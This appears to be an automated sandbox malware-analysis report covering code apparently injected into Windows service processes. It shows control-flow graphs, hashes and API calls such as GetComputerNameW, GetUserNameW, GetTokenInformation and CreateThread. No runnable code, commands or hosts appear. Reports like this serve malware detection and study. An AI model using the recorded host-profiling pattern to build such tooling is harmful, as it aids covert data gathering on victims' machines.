                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 79 7d8070-7d817e 81 7d813d-7d81a5 79->81 82 7d8180 79->82 88 7d81bd-7d81ca 81->88 89 7d81a7 81->89 82->81 85 7d8161 82->85 87 7d8163-7d8170 call 807164 85->87 93 7d8186 CloseHandle 87->93 94 7d8172 87->94 95 7d81d0 88->95 96 7d80f3 88->96 97 7d818c-7d8192 93->97 94->97 112 7d81fe-7d8201 GetTokenInformation 95->112 113 7d80c3 95->113 100 7d808c 96->100 101 7d80f5 96->101 98 7d8115-7d8118 97->98 99 7d8194 97->99 107 7d8119-7d811a 98->107 108 7d80a7 98->108 99->98 103 7d819a 99->103 104 7d808e-7d8184 100->104 101->100 109 7d8077 101->109 103->81 104->93 104->97 107->108 114 7d811c 107->114 115 7d81d7-7d81de call 80715c 109->115 118 7d820f 112->118 124 7d81b7 112->124 113->112 117 7d80c9 113->117 114->118 125 7d81e3-7d81e6 115->125 122 7d80ca-7d80d8 GetTokenInformation 117->122 118->104 120 7d8215-7d821e 118->120 120->104 134 7d8224 120->134 123 7d810f 122->123 127 7d812d 123->127 128 7d8111 123->128 124->118 126 7d81b9-7d81bb 124->126 125->122 137 7d8089 125->137 126->88 131 7d80a8 127->131 132 7d8133-7d81f0 127->132 128->127 133 7d8113 128->133 138 7d80aa-7d80ad 131->138 140 7d80da-7d80f1 132->140 141 7d81f6 132->141 133->98 134->115 139 7d8226 134->139 137->122 142 7d808b 137->142 138->87 143 7d80b3-7d8203 138->143 139->115 144 7d8228-7d82ee call 7d5d90 139->144 140->138 141->140 145 7d81fc 141->145 142->100 143->87 149 7d8209 143->149 154 7d830c-7d8320 call 7d5d90 call 7dec00 144->154 155 7d82f0 144->155 145->112 158 7d82f7-7d82fc call 7d5d90 154->158 171 7d8322 154->171 155->154 156 7d82f2 155->156 156->158 164 7d8253-7d8265 call 7f1280 158->164 165 7d8302 158->165 172 7d8328 164->172 173 7d826b 164->173 165->164 168 7d8308-7d830a 165->168 168->154 171->158 174 7d8324-7d8326 171->174 178 7d82df-7d832b 172->178 179 7d8335 172->179 173->172 177 7d823f-7d8243 173->177 174->172 177->158 178->179 182 7d832d-7d8331 178->182 183 7d829b-7d829d 179->183 184 7d8287 179->184 182->179 184->183 186 7d824e-7d8252 184->186 186->164
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001E.00000002.2627366659.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_30_2_7d0000_TieringEngineService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
                                                                                                                                                                      • Instruction ID: f705c41dd1ce3a9dd19cb82811641ec8f54ce8202bd5e5811af2f6e56a5d5b08
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
                                                                                                                                                                      • Instruction Fuzzy Hash: 9261127060CA49DFC7E59B2888583397BB0FB55360F68065BE44AC33A0DF2DAC4A9753
                                                                                                                                                                      Function 007D5910 Relevance: 1.9, APIs: 1, Instructions: 607COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 187 7d5910-7d5968 189 7d596a 187->189 190 7d5915-7d5928 call 809970 187->190 189->190 193 7d5931-7e072c 189->193 195 7d59b8 call 7f0df0 190->195 198 7e0806-7e0809 193->198 199 7e0732-7e0738 193->199 202 7d59bd-7d59c2 call 7d5d90 195->202 207 7e079d-7e07a6 198->207 200 7e073e 199->200 201 7e0800 199->201 200->201 204 7e0744-7e0774 200->204 201->198 205 7e06b3-7e06b7 201->205 212 7d59c7-7d59ce 202->212 215 7e077a-7e081c 204->215 216 7e06d5-7e06d9 204->216 205->207 209 7e06bd 205->209 210 7e07a8 207->210 211 7e0791-7e0793 207->211 209->207 217 7e06c3-7e07fe 209->217 210->211 219 7e07aa 210->219 218 7e07ca-7e07cc 211->218 213 7d5a1a-7d5a26 call 7d5e10 212->213 214 7d59d0 212->214 213->195 232 7d5a08-7d5a0b 213->232 214->213 220 7d59d2-7d59d8 214->220 215->207 223 7e06df 216->223 224 7e06db 216->224 217->201 219->218 239 7d59d9-7d59de call 802190 220->239 223->207 224->223 227 7e06dd 224->227 227->223 231 7ec0cc 227->231 233 7ec0ce-7ec0d0 231->233 234 7ec0e8-7ec102 231->234 237 7d5a0d 232->237 238 7d5994-7d599c 232->238 235 7ec0d2-7ec0df 233->235 234->235 236 7ec104 234->236 247 7ec0e7 235->247 236->235 236->247 250 7d5991 237->250 251 7d5932 237->251 240 7d599e-7d59f7 238->240 241 7d5a02 238->241 239->238 255 7d59e0 239->255 240->241 253 7d597d 241->253 254 7d59d4-7d5a15 call 7f11a0 241->254 250->251 256 7d5993 250->256 252 7d59e4-7d59ec call 8021ac 251->252 264 7d59ed 252->264 265 7d5a62-7d5a6e 252->265 253->254 259 7d597f-7d5981 253->259 255->238 260 7d59e2 255->260 256->238 263 7d5983-7d5a38 259->263 260->252 263->238 270 7d5a3e 263->270 264->263 268 7d59ee-7d59ef 264->268 271 7d5a75-7d5ab3 call 7f1280 265->271 272 7d5a70 265->272 268->263 273 7d59f1 268->273 270->239 280 7d5abb-7d5ac9 271->280 281 7d5ab5 271->281 272->271 274 7d5a72 272->274 273->190 274->271 282 7d5af2-7d5af5 280->282 281->280 283 7d5ab7-7d5ab9 281->283 287 7d5adb-7d5adc 282->287 288 7d5ad5 282->288 283->280 290 7d5a45-7d5a46 287->290 291 7d5ae2 287->291 288->287 289 7d5ad7-7d5ad9 288->289 289->287 291->290 292 7d5ae8 291->292 292->282
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001E.00000002.2627366659.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_30_2_7d0000_TieringEngineService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction ID: dd030ea929924df9b248719b8a01b71956390c042cc1bbed908b9ae5dd70a1ac
                                                                                                                                                                      • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction Fuzzy Hash: 66F1262071DE4CCFC76AA72C58553BA77E2FB99320F58419BE14AC3396DD2C9C468782
                                                                                                                                                                      Function 007D5B42 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 335 7d5b42-7d5b47 call 7d5d90 337 7d5b4c-7d5b52 335->337 339 7d5b0d 337->339 340 7d5c42-7d5c62 call 7f1280 337->340 339->340 341 7d5b13 339->341 357 7d5c14-7d5cc0 340->357 358 7d5c26 340->358 343 7d5c8f-7d5c96 341->343 345 7d5c29 343->345 346 7d5c98-7d5c9a 343->346 349 7d5c2f-7d5c36 345->349 350 7d5cc2-7d5cc9 call 7d52a0 345->350 348 7d5c9c 346->348 355 7d5d0e-7d5d18 348->355 356 7d5bfa 348->356 349->350 353 7d5c3c 349->353 365 7d5c69 350->365 366 7d5ccb 350->366 353->335 361 7d5d1a 355->361 362 7d5d54 355->362 356->355 360 7d5c00 356->360 357->350 358->357 364 7d5c28 358->364 360->357 369 7d5d4b-7d5d52 361->369 364->345 367 7d5c6f 365->367 368 7d5b68-7d5d75 365->368 366->348 370 7d5ccd 366->370 367->368 373 7d5c75 367->373 369->362 374 7d5d45-7d5d47 369->374 370->348 371 7d5ccf-7d5ce4 CreateThread 370->371 378 7d5cea 371->378 379 7d5c01-7d5c05 371->379 373->343 376 7d5d5f 374->376 377 7d5d49 374->377 380 7d5d65 376->380 377->369 377->376 378->379 381 7d5cf0-7d5cf6 378->381 383 7d5c20-7d5c68 379->383 386 7d5d37-7d5d41 379->386 380->380 381->383 386->369 387 7d5d43 386->387 387->362
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001E.00000002.2627366659.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_30_2_7d0000_TieringEngineService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction ID: 5cb1fc14b6b70ceb068c4c9ba181c3f6b5947ecb48238432e299b3ed6d59a3bd
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction Fuzzy Hash: C221B03022CF46CFCB699B18849877476F2EB55351F6802A7844FCF3A6DA6C8C449772
                                                                                                                                                                      Function 007D5B09 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 388 7d5b09-7d5d01 393 7d5bb4-7d5ce4 CreateThread 388->393 394 7d5d07 388->394 399 7d5cea 393->399 400 7d5c01-7d5c05 393->400 394->393 395 7d5d0d 394->395 398 7d5d37-7d5d41 395->398 401 7d5d4b-7d5d52 398->401 402 7d5d43 398->402 399->400 403 7d5cf0-7d5cf6 399->403 400->398 407 7d5c20-7d5c68 400->407 404 7d5d45-7d5d47 401->404 405 7d5d54 401->405 402->405 403->407 408 7d5d5f 404->408 409 7d5d49 404->409 412 7d5d65 408->412 409->401 409->408 412->412
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001E.00000002.2627366659.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_30_2_7d0000_TieringEngineService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction ID: f27e27d2af68416b0f92edf14ed99b1f8f69e2bc52c907cc28f268c094606e76
                                                                                                                                                                      • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction Fuzzy Hash: A501F57021DF478FDB6557248C583797BB1EB11324F2901ABC48BCA395DA6C4900A732
                                                                                                                                                                      Function 007D5B87 Relevance: 1.5, APIs: 1, Instructions: 23threadCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 413 7d5b87-7d5b99 CreateThread 414 7d5b1c-7d5b3b 413->414 415 7d5cff-7d5d01 413->415 414->415 416 7d5bb4-7d5ce4 CreateThread 415->416 417 7d5d07 415->417 423 7d5cea 416->423 424 7d5c01-7d5c05 416->424 417->416 418 7d5d0d 417->418 422 7d5d37-7d5d41 418->422 425 7d5d4b-7d5d52 422->425 426 7d5d43 422->426 423->424 427 7d5cf0-7d5cf6 423->427 424->422 431 7d5c20-7d5c68 424->431 428 7d5d45-7d5d47 425->428 429 7d5d54 425->429 426->429 427->431 432 7d5d5f 428->432 433 7d5d49 428->433 436 7d5d65 432->436 433->425 433->432 436->436
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001E.00000002.2627366659.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_30_2_7d0000_TieringEngineService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                      • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction ID: bfead7c4756c00284398140250957747a7b01731f29ed647bd9ba65c473c6d14
                                                                                                                                                                      • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction Fuzzy Hash: 66E0867061DB484FDB599B2458203293EF5EB88310F1501CFC44ADB2D1CB7D09054796
                                                                                                                                                                      Function 007D599B Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 437 7d599b-7d599e 438 7d59b8 call 7f0df0 437->438 439 7d59f7 437->439 443 7d59bd-7d59c2 call 7d5d90 438->443 440 7d5a02 439->440 444 7d597d 440->444 445 7d59d4-7d5a15 call 7f11a0 440->445 449 7d59c7-7d59ce 443->449 444->445 448 7d597f-7d5981 444->448 453 7d5983-7d5a38 448->453 450 7d5a1a-7d5a26 call 7d5e10 449->450 451 7d59d0 449->451 450->438 466 7d5a08-7d5a0b 450->466 451->450 454 7d59d2-7d59d8 451->454 460 7d5a3e 453->460 461 7d5994-7d599c 453->461 467 7d59d9-7d59de call 802190 454->467 460->467 461->440 462 7d599e 461->462 462->439 466->461 468 7d5a0d 466->468 467->461 474 7d59e0 467->474 472 7d5991 468->472 473 7d5932 468->473 472->473 476 7d5993 472->476 475 7d59e4-7d59ec call 8021ac 473->475 474->461 477 7d59e2 474->477 480 7d59ed 475->480 481 7d5a62-7d5a6e 475->481 476->461 477->475 480->453 482 7d59ee-7d59ef 480->482 483 7d5a75-7d5ab3 call 7f1280 481->483 484 7d5a70 481->484 482->453 485 7d59f1 call 809970 482->485 494 7d5abb-7d5ac9 483->494 495 7d5ab5 483->495 484->483 486 7d5a72 484->486 485->438 486->483 496 7d5af2-7d5af5 494->496 495->494 497 7d5ab7-7d5ab9 495->497 501 7d5adb-7d5adc 496->501 502 7d5ad5 496->502 497->494 504 7d5a45-7d5a46 501->504 505 7d5ae2 501->505 502->501 503 7d5ad7-7d5ad9 502->503 503->501 505->504 506 7d5ae8 505->506 506->496
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001E.00000002.2627366659.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_30_2_7d0000_TieringEngineService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1284135714-0
                                                                                                                                                                      • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction ID: 971551cf1f85ba6609cf53f4e605bff33f4daeb40537088e541ebf14741e5094
                                                                                                                                                                      • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction Fuzzy Hash: 6D01F970A0DE90CFD757971844692796A72F794330F28555BA08ACB393DC3C6D009752
                                                                                                                                                                      Function 007D8090 Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 507 7d8090-7d8096 508 7d813c-7d81a5 507->508 509 7d8184 507->509 521 7d81bd-7d81ca 508->521 522 7d81a7 508->522 511 7d818c-7d8192 509->511 512 7d8186 CloseHandle 509->512 513 7d8115-7d8118 511->513 514 7d8194 511->514 512->511 517 7d8119-7d811a 513->517 518 7d80a7 513->518 514->513 515 7d819a 514->515 515->508 517->518 520 7d811c 517->520 523 7d820f 520->523 528 7d81d0 521->528 529 7d80f3 521->529 524 7d808e-7d8096 523->524 525 7d8215-7d821e 523->525 524->509 525->524 532 7d8224 525->532 540 7d81fe-7d8201 GetTokenInformation 528->540 541 7d80c3 528->541 530 7d808c 529->530 531 7d80f5 529->531 530->524 531->530 538 7d8077 531->538 536 7d81d7-7d81e6 call 80715c 532->536 537 7d8226 532->537 549 7d80ca-7d810f GetTokenInformation 536->549 556 7d8089 536->556 537->536 539 7d8228-7d82ee call 7d5d90 537->539 538->536 562 7d830c-7d8320 call 7d5d90 call 7dec00 539->562 563 7d82f0 539->563 540->523 553 7d81b7 540->553 541->540 545 7d80c9 541->545 545->549 558 7d812d 549->558 559 7d8111 549->559 553->523 557 7d81b9-7d81bb 553->557 556->549 564 7d808b 556->564 557->521 560 7d80a8 558->560 561 7d8133-7d81f0 558->561 559->558 565 7d8113 559->565 568 7d80aa-7d80ad 560->568 570 7d80da-7d80f1 561->570 571 7d81f6 561->571 572 7d82f7-7d82fc call 7d5d90 562->572 595 7d8322 562->595 563->562 567 7d82f2 563->567 564->530 565->513 567->572 574 7d8163-7d8170 call 807164 568->574 575 7d80b3-7d8203 568->575 570->568 571->570 576 7d81fc 571->576 586 7d8253-7d8265 call 7f1280 572->586 587 7d8302 572->587 574->512 588 7d8172 574->588 575->574 582 7d8209 575->582 576->540 596 7d8328 586->596 597 7d826b 586->597 587->586 592 7d8308-7d830a 587->592 588->511 592->562 595->572 598 7d8324-7d8326 595->598 602 7d82df-7d832b 596->602 603 7d8335 596->603 597->596 601 7d823f-7d8243 597->601 598->596 601->572 602->603 606 7d832d-7d8331 602->606 607 7d829b-7d829d 603->607 608 7d8287 603->608 606->603 608->607 610 7d824e-7d8252 608->610 610->586
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001E.00000002.2627366659.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_30_2_7d0000_TieringEngineService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction ID: 16c62c5db29afdb0126027ccede620c42761c7eb7b6e36da0a415be928e715e7
                                                                                                                                                                      • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction Fuzzy Hash: CFC04C6152995EB756F906485C1B4B826709606791B1C044F9C0A81320DD5F8E4F55A7
                                                                                                                                                                      Function 007D817F Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 611 7d817f 612 7d8184 611->612 613 7d818c-7d8192 612->613 614 7d8186 CloseHandle 612->614 615 7d8115-7d8118 613->615 616 7d8194 613->616 614->613 618 7d8119-7d811a 615->618 619 7d80a7 615->619 616->615 617 7d819a-7d81a5 616->617 629 7d81bd-7d81ca 617->629 630 7d81a7 617->630 618->619 621 7d811c 618->621 623 7d820f 621->623 624 7d808e-7d8096 623->624 625 7d8215-7d821e 623->625 624->612 625->624 631 7d8224 625->631 637 7d81d0 629->637 638 7d80f3 629->638 632 7d81d7-7d81e6 call 80715c 631->632 633 7d8226 631->633 652 7d8089 632->652 653 7d80ca-7d810f GetTokenInformation 632->653 633->632 635 7d8228-7d82ee call 7d5d90 633->635 657 7d830c-7d8320 call 7d5d90 call 7dec00 635->657 658 7d82f0 635->658 654 7d81fe-7d8201 GetTokenInformation 637->654 655 7d80c3 637->655 641 7d808c 638->641 642 7d80f5 638->642 641->624 642->641 650 7d8077 642->650 650->632 652->653 660 7d808b 652->660 664 7d812d 653->664 665 7d8111 653->665 654->623 670 7d81b7 654->670 655->654 661 7d80c9 655->661 669 7d82f7-7d82fc call 7d5d90 657->669 698 7d8322 657->698 658->657 663 7d82f2 658->663 660->641 661->653 663->669 667 7d80a8 664->667 668 7d8133-7d81f0 664->668 665->664 671 7d8113 665->671 676 7d80aa-7d80ad 667->676 678 7d80da-7d80f1 668->678 679 7d81f6 668->679 685 7d8253-7d8265 call 7f1280 669->685 686 7d8302 669->686 670->623 675 7d81b9-7d81bb 670->675 671->615 675->629 681 7d8163-7d8170 call 807164 676->681 682 7d80b3-7d8203 676->682 678->676 679->678 684 7d81fc 679->684 681->614 697 7d8172 681->697 682->681 692 7d8209 682->692 684->654 700 7d8328 685->700 701 7d826b 685->701 686->685 693 7d8308-7d830a 686->693 693->657 697->613 698->669 702 7d8324-7d8326 698->702 706 7d82df-7d832b 700->706 707 7d8335 700->707 701->700 705 7d823f-7d8243 701->705 702->700 705->669 706->707 710 7d832d-7d8331 706->710 711 7d829b-7d829d 707->711 712 7d8287 707->712 710->707 712->711 714 7d824e-7d8252 712->714 714->685
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001E.00000002.2627366659.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_30_2_7d0000_TieringEngineService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction ID: 1b89de7a9292d5d92c799f2d3a346bf665fb838ce62cdc1c5ca208d2e230a382
                                                                                                                                                                      • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction Fuzzy Hash: F8C092A055950DA751F926886C0A0B9357096137A0F0C441FEC0A8A360DD5F8D4F45F3

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00BC52A0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 282 bc52a0-bc53fe 287 c00d4c-c00d4e 282->287 288 bc5400-bc5424 282->288 290 bc542a 288->290 291 bc539b 288->291 290->291 292 bc5430-bc543e 290->292 293 bc539d-bc53a1 291->293 294 bc5413-bc5419 291->294 295 bc5441-bc544a 292->295 296 bc53a7 293->296 297 bc52b0-bc52b5 293->297 303 bc53c4-bc53ca GetSystemDefaultLangID 295->303 304 bc5450 295->304 296->297 298 bc53ad 296->298 299 bc53af 298->299 300 bc53f3-bc53f9 298->300 302 bc53e0-bc53f1 299->302 312 bc532a 300->312 313 bc5355 300->313 302->294 302->300 307 bc5475-bc547b 303->307 310 bc5411 304->310 311 bc53c1 304->311 307->287 310->294 310->303 311->310 314 bc53c3 311->314 312->313 315 bc532c-bc533f 312->315 318 bc52e8-bc5363 313->318 319 bc52d1-bc52e7 313->319 317 bc536b-bc536f 315->317 317->295 320 bc5375-bc5390 317->320 324 bc5365 318->324 325 bc53d1-bc53d5 318->325 319->318 320->314 327 bc5392-bc539a 320->327 324->325 328 bc5367-bc5369 324->328 325->293 326 bc53d7 325->326 326->302 329 bc5342-bc5345 326->329 327->293 328->317 329->288 330 bc534b 329->330 330->288 331 bc5351-bc5353 330->331 331->313
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemDefaultLangID.KERNELBASE ref: 00BC53C4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001F.00000002.1449878526.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_31_2_bc0000_AgentService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultLangSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 706401283-0
                                                                                                                                                                      • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction ID: 22ca38aa462139891ad997b817fd2c6cff5c9150a01df945659ece81687ea8d7
                                                                                                                                                                      • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction Fuzzy Hash: CC41D4A150DED58FD73A422448A4F717BD0EB923E2F9901DED0C38A1E6E1987CC1932A
                                                                                                                                                                      Function 00BE0080 Relevance: 5.0, APIs: 3, Instructions: 466COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 be0080-be0286 2 be028c 0->2 3 be0099-be0575 0->3 4 be0445 2->4 7 be057b 3->7 8 be0155 3->8 4->3 6 be044b-be0457 4->6 10 be0458-be0472 GetComputerNameW 6->10 7->8 11 be0581-be0587 7->11 9 be02ef-be0495 call bce050 * 2 8->9 9->10 52 be043e 9->52 15 be03ee-be03f4 10->15 16 be024c-be0253 10->16 13 be058b 11->13 18 be058c-be0591 13->18 19 be0181 VirtualFree 13->19 39 be00da-be023f 15->39 40 be03fa 15->40 23 be01e6 16->23 24 be0255 16->24 21 be04ab-be04af 18->21 22 be0597 18->22 20 be01a8-be02ac call bf7164 19->20 28 be02b1-be02be 20->28 49 be04c7 21->49 22->21 30 be059d 22->30 27 be01ec-be0313 call bf715c 23->27 23->28 31 be02d3 24->31 55 be0318-be031e 27->55 35 be03bf-be03d9 GetUserNameW 28->35 36 be02c4 28->36 30->21 31->23 38 be02d9 31->38 44 be0331 35->44 36->35 45 be02ca 36->45 38->9 39->16 53 be0241-be024a 39->53 40->39 46 be0400 40->46 50 be0337 44->50 51 be0171 44->51 45->31 54 beb1ee-beb49f 46->54 61 be04cc-be04e6 call bf9970 GetComputerNameW 49->61 50->51 58 be033d 50->58 56 be013f-be0146 51->56 57 be0173 51->57 52->4 53->16 53->28 59 be0568-be056b 55->59 60 be0324 55->60 56->13 62 be0230 57->62 63 be05d0-be05d9 58->63 59->61 60->59 65 be032a 60->65 69 be04ec-be0514 61->69 70 be0131 61->70 62->49 68 be0236-be05c2 62->68 63->54 65->44 68->49 74 be05c8-be05c9 68->74 69->59 72 be0089-be008c 70->72 73 be0137 70->73 72->20 76 be0092 72->76 73->72 77 be013d 73->77 74->63 76->20 78 be0098 76->78 77->19 77->56 78->3
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001F.00000002.1449878526.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_31_2_bc0000_AgentService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                                                      • Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                                                                                                                                                      • Instruction ID: c11ee5687c00c96b91de077c18f7551a54bbc0b244710c1d6e6b7626570a282a
                                                                                                                                                                      • Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                                                                                                                                                      • Instruction Fuzzy Hash: 89D12831428B4D8BC724FF59D8857EAB3E1FBA0310F18469FE446C7165DBB4D68586C2
                                                                                                                                                                      Function 00BC8070 Relevance: 4.7, APIs: 3, Instructions: 236COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
